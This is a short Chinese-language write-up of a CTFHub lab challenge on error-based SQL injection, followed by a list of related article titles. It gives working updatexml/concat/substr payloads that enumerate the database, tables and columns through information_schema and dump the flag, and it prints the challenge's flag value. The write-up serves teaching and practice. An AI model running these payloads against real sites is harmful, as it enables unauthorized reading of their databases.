【ctfhub】SQL注入报错注入
2023-09-14 09:15:03 时间
题目描述:
我们输入1
得到查询正确
我们再输入1`试试
给出了报错内容,并且标明了错误点是`
然后我们利用sql函数进行查询
-1 union select updatexml(1,concat('~', substr((select group_concat(schema_name) from information_schema.schemata),1,31) ),1)
-1 union select updatexml(1,concat('~', substr((select group_concat(schema_name) from information_schema.schemata),30,31) ),1)
库名为 sqli
查询表名
-1 union select updatexml(1,concat('~', substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),1,31) ),1)
查询列名
-1 union select updatexml(1,concat('~', substr((select group_concat(column_name) from information_schema.columns where table_schema='sqli' && table_name='flag'),1,31) ),1)
查询字段
-1 union select updatexml(1,concat('~', substr((select group_concat(flag) from flag),1,31) ),1)
-1 union select updatexml(1,concat('~', substr((select group_concat(flag) from flag),20,31) ),1)
得到flag
ctfhub{455aa3bdb68aebab7571a24c}
相关文章
- 多种DLL注入技术原理介绍
- SQL 报错注入详解[通俗易懂]
- Mybatis中SQL注入攻击的3种方式,真是防不胜防!
- SQL注入-报错注入[通俗易懂]
- SQL注入报错注入函数[通俗易懂]
- 审计一套CMS中的SQL注入
- 【IOC 控制反转】Android 事件依赖注入 ( 事件三要素 | 修饰注解的注解 | 事件依赖注入步骤 )
- 精通Oracle:学习SQL编写技巧(sql编写oracle)
- 用Oracle动态SQL轻松解决复杂问题(oracle动态sql)
- 星巴克挖矿事件分析:黑客是如何黑掉WiFi并将挖矿代码注入到HTML页面的?
- 语句深入Linux:如何执行SQL语句?(linux怎么执行sql)
- 和 sql server支持两者:Oracle 和 SQL Server的兼容性(兼容oracle)
- 如何防范SQL注入攻击:MySQL的几种安全策略(sql注入mysql)
- SQL注入攻击对MSSQL的威胁及防护策略(sql注入 mssql)
- sql 注入MSSQL防止SQL注入:强力防护的关键步骤(mssql阻止)
- Oracle SQL跟踪工具大揭秘!(oracle跟踪sql工具)
- 删除MySQL中的SQL语句介绍(删除sql mysql)
- SQLserver如何快速导入SQL文件(sqlserver导入sql文件)
- 将数据存入Redis,注入无限可能性(数据存到redis里面)
- 实现数据库优化Oracle中利用SQL语句实现数据库性能优化(oracle中执行sql)
- Oracle SQL实现转置-简单快捷(oracle sql转置)
- oracle—SQL技巧之(一)连续记录查询sql案例测试